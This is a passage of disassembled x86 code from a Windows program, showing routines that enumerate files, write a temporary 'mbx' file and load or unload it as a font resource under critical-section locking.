mov ecx, [ebp+var_40]
mov [eax], ecx
loc_4FF5D2: ; CODE XREF: sub_4FF252+376�j
push 0FFFFFFFFh
mov [ebp+var_5C], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_5C]
jmp short loc_4FF62D
; ---------------------------------------------------------------------------
loc_4FF5EB: ; CODE XREF: sub_4FF252+15A�j
; sub_4FF252+1C8�j
cmp [ebp+arg_8], 0
jz short loc_4FF60C
mov eax, ds:dword_511908
mov eax, [eax+0Ch]
shl eax, 4
mov ecx, ds:dword_511908
mov ecx, [ecx+8]
add ecx, eax
mov eax, [ebp+arg_8]
mov [eax], ecx
loc_4FF60C: ; CODE XREF: sub_4FF252+39D�j
push 12h
call ds:dword_51178C ; RtlRestoreLastWin32Error
loc_4FF614: ; CODE XREF: sub_4FF252+D1�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4FF61F
jmp short loc_4FF62B
sub_4FF252 endp
; =============== S U B R O U T I N E =======================================
sub_4FF61F proc near ; CODE XREF: sub_4FF252+3C6�p
; DATA XREF: _6:0050E2D8�o
push offset dword_5118C8
call ds:dword_511754 ; RtlLeaveCriticalSection
retn
sub_4FF61F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4FF252
loc_4FF62B: ; CODE XREF: sub_4FF252+3CB�j
xor eax, eax
loc_4FF62D: ; CODE XREF: sub_4FF252+51�j
; sub_4FF252+13A�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4FF252
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FF63E proc near ; CODE XREF: sub_50A334+E�p
; sub_50A361+7D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+arg_8]
or dword ptr [eax], 0FFFFFFFFh
push 0Ch
call sub_50835A
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4FF67B
mov eax, [ebp+var_8]
and dword ptr [eax], 0
mov eax, [ebp+var_8]
and dword ptr [eax+4], 0
mov eax, [ebp+var_8]
and dword ptr [eax+8], 0
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
jmp short loc_4FF67F
; ---------------------------------------------------------------------------
loc_4FF67B: ; CODE XREF: sub_4FF63E+1F�j
and [ebp+var_C], 0
loc_4FF67F: ; CODE XREF: sub_4FF63E+3B�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and dword ptr [eax], 0
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4FF252
test eax, eax
jz short loc_4FF6D8
push 0
push [ebp+arg_0]
call sub_5092CA
pop ecx
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+4], eax
mov eax, [ebp+var_4]
and dword ptr [eax+8], 0
push [ebp+var_4]
push [ebp+var_4]
mov ecx, ds:dword_5118EC
call sub_4FC000
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
mov [eax], ecx
and [ebp+var_4], 0
push 1
pop eax
jmp short locret_4FF6DA
; ---------------------------------------------------------------------------
loc_4FF6D8: ; CODE XREF: sub_4FF63E+5D�j
xor eax, eax
locret_4FF6DA: ; CODE XREF: sub_4FF63E+98�j
leave
retn 0Ch
sub_4FF63E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FF6DE proc near ; CODE XREF: sub_50A626+12�p
; sub_50A657+19�p
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004FF805 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E2F0
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_5118EC
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4FF724
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4FF728
; ---------------------------------------------------------------------------
loc_4FF724: ; CODE XREF: sub_4FF6DE+31�j
and [ebp+var_24], 0
loc_4FF728: ; CODE XREF: sub_4FF6DE+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz loc_4FF805
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_5118EC
call sub_50B871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_4FF7DE
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jnz short loc_4FF778
push [ebp+var_1C]
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call sub_4FF252
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_4FF778: ; CODE XREF: sub_4FF6DE+82�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jnz short loc_4FF7C5
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jnz short loc_4FF7B1
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call ds:dword_5116D0 ; FindFirstFileA
mov ecx, [ebp+var_1C]
mov [ecx+8], eax
mov eax, [ebp+var_1C]
xor ecx, ecx
cmp dword ptr [eax+8], 0FFFFFFFFh
setnz cl
mov eax, [ebp+arg_8]
mov [eax], ecx
jmp short loc_4FF7C5
; ---------------------------------------------------------------------------
loc_4FF7B1: ; CODE XREF: sub_4FF6DE+A9�j
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
call ds:dword_5116D4 ; FindNextFileA
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_4FF7C5: ; CODE XREF: sub_4FF6DE+A0�j
; sub_4FF6DE+D1�j
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4FF807
; ---------------------------------------------------------------------------
loc_4FF7DE: ; CODE XREF: sub_4FF6DE+6F�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4FF7E9
jmp short loc_4FF805
sub_4FF6DE endp
; =============== S U B R O U T I N E =======================================
sub_4FF7E9 proc near ; CODE XREF: sub_4FF6DE+104�p
mov eax, ds:dword_5118EC
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_4FF804
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_4FF804: ; CODE XREF: sub_4FF7E9+C�j
retn
sub_4FF7E9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4FF6DE
loc_4FF805: ; CODE XREF: sub_4FF6DE+50�j
; sub_4FF6DE+109�j
xor eax, eax
loc_4FF807: ; CODE XREF: sub_4FF6DE+FE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4FF6DE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FF818 proc near ; CODE XREF: sub_500741+CE�p
; sub_50A5FF+B�p
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004FF939 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E300
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
mov eax, ds:dword_5118EC
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_4FF85E
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_4FF862
; ---------------------------------------------------------------------------
loc_4FF85E: ; CODE XREF: sub_4FF818+31�j
and [ebp+var_2C], 0
loc_4FF862: ; CODE XREF: sub_4FF818+44�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_4FF939
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_5118EC
call sub_50B871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_4FF912
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jz short loc_4FF8A2
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
call ds:dword_5116A4 ; CloseHandle
loc_4FF8A2: ; CODE XREF: sub_4FF818+7C�j
push [ebp+arg_0]
mov ecx, ds:dword_5118EC
call sub_50B8E0
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4FF8EC
mov eax, [ebp+var_20]
mov eax, [eax+4]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_5083DD
pop ecx
push 1
pop eax
and eax, 1
test eax, eax
jz short loc_4FF8E4
push [ebp+var_20]
call sub_5083DD
pop ecx
loc_4FF8E4: ; CODE XREF: sub_4FF818+C1�j
mov eax, [ebp+var_20]
mov [ebp+var_38], eax
jmp short loc_4FF8F0
; ---------------------------------------------------------------------------
loc_4FF8EC: ; CODE XREF: sub_4FF818+A5�j
and [ebp+var_38], 0
loc_4FF8F0: ; CODE XREF: sub_4FF818+D2�j
mov eax, [ebp+arg_4]
mov dword ptr [eax], 1
push 0FFFFFFFFh
mov [ebp+var_3C], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_4FF93B
; ---------------------------------------------------------------------------
loc_4FF912: ; CODE XREF: sub_4FF818+6F�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4FF91D
jmp short loc_4FF939
sub_4FF818 endp
; =============== S U B R O U T I N E =======================================
sub_4FF91D proc near ; CODE XREF: sub_4FF818+FE�p
; DATA XREF: _6:0050E308�o
mov eax, ds:dword_5118EC
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short locret_4FF938
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_4FF938: ; CODE XREF: sub_4FF91D+C�j
retn
sub_4FF91D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4FF818
loc_4FF939: ; CODE XREF: sub_4FF818+50�j
; sub_4FF818+103�j
xor eax, eax
loc_4FF93B: ; CODE XREF: sub_4FF818+F8�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4FF818
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FF94C proc near ; CODE XREF: sub_50B23E+20�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = dword ptr -6Ch
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004FFAAF SIZE 000001F8 BYTES
; FUNCTION CHUNK AT 004FFD11 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E310
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 80h
push ebx
push esi
push edi
or [ebp+var_20], 0FFFFFFFFh
or [ebp+var_28], 0FFFFFFFFh
and [ebp+var_2C], 0
and [ebp+var_1C], 0
and [ebp+var_24], 0
push 0
lea eax, [ebp+var_20]
push eax
push 3
push 80000000h
push [ebp+arg_0]
call sub_500346
test eax, eax
jz loc_4FFD11
cmp [ebp+var_20], 0FFFFFFFFh
jz loc_4FFD11
mov eax, ds:dword_5118E4
mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_4FF9D0
mov eax, [ebp+var_6C]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_70], 1
jmp short loc_4FF9D4
; ---------------------------------------------------------------------------
loc_4FF9D0: ; CODE XREF: sub_4FF94C+6F�j
and [ebp+var_70], 0
loc_4FF9D4: ; CODE XREF: sub_4FF94C+82�j
movzx eax, [ebp+var_70]
test eax, eax
jz loc_4FFD11
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_20]
mov ecx, ds:dword_5118E4
call sub_50B871
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_34], eax
cmp [ebp+var_30], 0
jnz short loc_4FFA1E
push ds:off_50E4F8
push 22h
push ds:off_50E4FC
call sub_50848C
loc_4FFA1E: ; CODE XREF: sub_4FF94C+BD�j
mov eax, ds:dword_5118E8
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_4FFA3F
mov eax, [ebp+var_74]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_78], 1
jmp short loc_4FFA43
; ---------------------------------------------------------------------------
loc_4FFA3F: ; CODE XREF: sub_4FF94C+DE�j
and [ebp+var_78], 0
loc_4FFA43: ; CODE XREF: sub_4FF94C+F1�j
movzx eax, [ebp+var_78]
test eax, eax
jz short loc_4FFAAF
mov [ebp+var_4], 1
mov eax, [ebp+var_30]
push dword ptr [eax]
mov ecx, ds:dword_5118E8
call sub_50B871
test eax, eax
jz short loc_4FFA88
push 0FFFFFFFFh
mov [ebp+var_84], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_84]
jmp loc_4FFD13
; ---------------------------------------------------------------------------
loc_4FFA88: ; CODE XREF: sub_4FF94C+118�j
and [ebp+var_4], 0
call sub_4FFA93
jmp short loc_4FFAAF
sub_4FF94C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4FFA93 proc near ; CODE XREF: sub_4FF94C+140�p
; DATA XREF: _6:0050E324�o
mov eax, ds:dword_5118E8
mov [ebp-7Ch], eax
cmp dword ptr [ebp-7Ch], 0
jz short locret_4FFAAE
mov eax, [ebp-7Ch]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_4FFAAE: ; CODE XREF: sub_4FFA93+C�j
retn
sub_4FFA93 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4FF94C
loc_4FFAAF: ; CODE XREF: sub_4FF94C+FD�j
; sub_4FF94C+145�j
push 104h
call sub_50835A
pop ecx
mov [ebp+var_50], eax
mov eax, [ebp+var_50]
mov [ebp+var_2C], eax
push 104h
call sub_50835A
pop ecx
mov [ebp+var_54], eax
mov eax, [ebp+var_54]
mov [ebp+var_1C], eax
push [ebp+var_1C]
push 104h
call ds:dword_511734 ; GetTempPathA
push [ebp+var_2C]
push 0
push offset aMbx ; "mbx"
push [ebp+var_1C]
call ds:dword_511730 ; GetTempFileNameA
push 0
push 0
push 4
push 0
push 1
push 40000000h
push [ebp+var_2C]
call ds:dword_5116A8 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_4FFB3B
push 0FFFFFFFFh
mov [ebp+var_88], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_88]
jmp loc_4FFD13
; ---------------------------------------------------------------------------
loc_4FFB3B: ; CODE XREF: sub_4FF94C+1CB�j
push 1000h
call sub_50835A
pop ecx
mov [ebp+var_58], eax
mov eax, [ebp+var_58]
mov [ebp+var_24], eax
and [ebp+var_38], 0
loc_4FFB53: ; CODE XREF: sub_4FF94C+2BF�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_38]
cmp ecx, [eax+8]
jnb loc_4FFC10
mov eax, [ebp+var_34]
mov eax, [eax+8]
mov [ebp+var_48], eax
cmp [ebp+var_48], 1000h
jbe short loc_4FFB7B
mov [ebp+var_48], 1000h
loc_4FFB7B: ; CODE XREF: sub_4FF94C+226�j
lea eax, [ebp+var_40]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
push [ebp+var_48]
push [ebp+var_24]
push [ebp+var_20]
call sub_501177
test eax, eax
jz short loc_4FFB9D
cmp [ebp+var_40], 0
jnz short loc_4FFBBF
loc_4FFB9D: ; CODE XREF: sub_4FF94C+249�j
push 0FFFFFFFFh
mov [ebp+var_8C], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_8C]
jmp loc_4FFD13
; ---------------------------------------------------------------------------
loc_4FFBBF: ; CODE XREF: sub_4FF94C+24F�j
push 0
lea eax, [ebp+var_44]
push eax
push [ebp+var_3C]
push [ebp+var_24]
push [ebp+var_28]
call ds:dword_5117BC ; WriteFile
test eax, eax
jz short loc_4FFBE0
mov eax, [ebp+var_44]
cmp eax, [ebp+var_3C]
jz short loc_4FFC02
loc_4FFBE0: ; CODE XREF: sub_4FF94C+28A�j
push 0FFFFFFFFh
mov [ebp+var_90], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_90]
jmp loc_4FFD13
; ---------------------------------------------------------------------------
loc_4FFC02: ; CODE XREF: sub_4FF94C+292�j
mov eax, [ebp+var_38]
add eax, [ebp+var_3C]
mov [ebp+var_38], eax
jmp loc_4FFB53
; ---------------------------------------------------------------------------
loc_4FFC10: ; CODE XREF: sub_4FF94C+210�j
push [ebp+var_28]
call ds:dword_5116A4 ; CloseHandle
or [ebp+var_28], 0FFFFFFFFh
push [ebp+var_2C]
call ds:dword_5117DC ; AddFontResourceA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_4FFC3C
push [ebp+var_2C]
call ds:dword_5116C0 ; DeleteFileA
loc_4FFC3C: ; CODE XREF: sub_4FF94C+2E5�j
push 8
call sub_50835A
pop ecx
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jz short loc_4FFC67
mov eax, [ebp+var_5C]
and dword ptr [eax], 0
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_2C]
mov [eax+4], ecx
mov eax, [ebp+var_5C]
mov [ebp+var_94], eax
jmp short loc_4FFC6E
; ---------------------------------------------------------------------------
loc_4FFC67: ; CODE XREF: sub_4FF94C+2FF�j
and [ebp+var_94], 0
loc_4FFC6E: ; CODE XREF: sub_4FF94C+319�j
push [ebp+var_94]
mov eax, [ebp+var_30]
push dword ptr [eax]
mov ecx, ds:dword_5118E8
call sub_4FC000
and [ebp+var_2C], 0
push 0FFFFFFFFh
mov [ebp+var_98], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_98]
jmp short loc_4FFD13
; END OF FUNCTION CHUNK FOR sub_4FF94C
; =============== S U B R O U T I N E =======================================
sub_4FFCA7 proc near ; DATA XREF: _6:0050E318�o
mov eax, ds:dword_5118E4
mov [ebp-80h], eax
cmp dword ptr [ebp-80h], 0
jz short loc_4FFCC2
mov eax, [ebp-80h]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
loc_4FFCC2: ; CODE XREF: sub_4FFCA7+C�j
cmp dword ptr [ebp-20h], 0FFFFFFFFh
jz short loc_4FFCD4
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-20h]
call sub_500741
loc_4FFCD4: ; CODE XREF: sub_4FFCA7+1F�j
cmp dword ptr [ebp-28h], 0FFFFFFFFh
jz short loc_4FFCE3
push dword ptr [ebp-28h]
call ds:dword_5116A4 ; CloseHandle
loc_4FFCE3: ; CODE XREF: sub_4FFCA7+31�j
mov eax, [ebp-2Ch]
mov [ebp-60h], eax
push dword ptr [ebp-60h]
call sub_5083DD
pop ecx
mov eax, [ebp-1Ch]
mov [ebp-64h], eax
push dword ptr [ebp-64h]
call sub_5083DD
pop ecx
mov eax, [ebp-24h]
mov [ebp-68h], eax
push dword ptr [ebp-68h]
call sub_5083DD
pop ecx
retn
sub_4FFCA7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4FF94C
loc_4FFD11: ; CODE XREF: sub_4FF94C+53�j
; sub_4FF94C+5D�j ...
xor eax, eax
loc_4FFD13: ; CODE XREF: sub_4FF94C+137�j
; sub_4FF94C+1EA�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4FF94C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FFD24 proc near ; CODE XREF: sub_50B277+20�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E328
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 34h
push ebx
push esi
push edi
or [ebp+var_20], 0FFFFFFFFh
and [ebp+var_1C], 0
push 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_50153F
test eax, eax
jz loc_4FFEBA
movzx eax, [ebp+var_24]
test eax, eax
jnz loc_4FFEBA
mov eax, ds:dword_5118E8
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jz short loc_4FFD98
mov eax, [ebp+var_34]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_38], 1
jmp short loc_4FFD9C
; ---------------------------------------------------------------------------
loc_4FFD98: ; CODE XREF: sub_4FFD24+5F�j
and [ebp+var_38], 0
loc_4FFD9C: ; CODE XREF: sub_4FFD24+72�j
movzx eax, [ebp+var_38]
test eax, eax
jz loc_4FFEBA
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_1C]
mov ecx, ds:dword_5118E8
call sub_50B871
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_4FFE88
mov eax, [ebp+var_28]
cmp dword ptr [eax], 0
jz short loc_4FFDE8
push ds:off_50E4F8
push 70h
push ds:off_50E4FC
call sub_50848C
loc_4FFDE8: ; CODE XREF: sub_4FFD24+AF�j
mov eax, [ebp+var_28]
cmp dword ptr [eax+4], 0
jnz short loc_4FFE04
push ds:off_50E4F8
push 71h
push ds:off_50E4FC
call sub_50848C
loc_4FFE04: ; CODE XREF: sub_4FFD24+CB�j
mov eax, [ebp+var_28]
push dword ptr [eax+4]
call ds:dword_5117EC ; RemoveFontResourceA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+var_28]
push dword ptr [eax+4]
call ds:dword_5116C0 ; DeleteFileA
push [ebp+var_1C]
mov ecx, ds:dword_5118E8
call sub_50B8E0
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4FFE6B
mov eax, [ebp+var_2C]
mov eax, [eax+4]
mov [ebp+var_3C], eax
push [ebp+var_3C]
call sub_5083DD
pop ecx
push 1
pop eax
and eax, 1
test eax, eax
jz short loc_4FFE63
push [ebp+var_2C]
call sub_5083DD
pop ecx
loc_4FFE63: ; CODE XREF: sub_4FFD24+134�j
mov eax, [ebp+var_2C]
mov [ebp+var_44], eax
jmp short loc_4FFE6F
; ---------------------------------------------------------------------------
loc_4FFE6B: ; CODE XREF: sub_4FFD24+118�j
and [ebp+var_44], 0
loc_4FFE6F: ; CODE XREF: sub_4FFD24+145�j
push 0FFFFFFFFh
mov [ebp+var_48], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_48]
jmp short loc_4FFEBC
; ---------------------------------------------------------------------------
loc_4FFE88: ; CODE XREF: sub_4FFD24+A3�j
push 0FFFFFFFFh
and [ebp+var_4C], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_4C]
jmp short loc_4FFEBC
; ---------------------------------------------------------------------------
loc_4FFE9E: ; DATA XREF: _6:0050E330�o
mov eax, ds:dword_5118E8
mov [ebp+var_40], eax
cmp [ebp+var_40], 0
jz short locret_4FFEB9
mov eax, [ebp+var_40]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_4FFEB9: ; CODE XREF: sub_4FFD24+186�j
retn
; ---------------------------------------------------------------------------
loc_4FFEBA: ; CODE XREF: sub_4FFD24+41�j
; sub_4FFD24+4D�j ...
xor eax, eax
loc_4FFEBC: ; CODE XREF: sub_4FFD24+162�j
; sub_4FFD24+178�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4FFD24 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FFECD proc near ; CODE XREF: sub_50B55B+B�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E338
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
mov eax, ds:dword_5118E0
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4FFF13
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4FFF17
; ---------------------------------------------------------------------------
loc_4FFF13: ; CODE XREF: sub_4FFECD+31�j
and [ebp+var_24], 0
loc_4FFF17: ; CODE XREF: sub_4FFECD+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz loc_4FFFAC
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_5118E0
call sub_50B871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_4FFF54
push 0FFFFFFFFh
and [ebp+var_2C], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4FFFAE
; ---------------------------------------------------------------------------
loc_4FFF54: ; CODE XREF: sub_4FFECD+6F�j
push 8000h
push 0
push [ebp+arg_0]
call ds:dword_5117A8 ; VirtualFree
mov ecx, [ebp+arg_4]
mov [ecx], eax
push [ebp+arg_0]
mov ecx, ds:dword_5118E0
call sub_50B8E0
push 0FFFFFFFFh
mov [ebp+var_30], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_4FFFAE
; ---------------------------------------------------------------------------
loc_4FFF90: ; DATA XREF: _6:0050E340�o
mov eax, ds:dword_5118E0
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short locret_4FFFAB
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_4FFFAB: ; CODE XREF: sub_4FFECD+CF�j
retn
; ---------------------------------------------------------------------------
loc_4FFFAC: ; CODE XREF: sub_4FFECD+50�j
xor eax, eax
loc_4FFFAE: ; CODE XREF: sub_4FFECD+85�j
; sub_4FFECD+C1�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4FFECD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FFFBF proc near ; CODE XREF: sub_50B51C+17�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
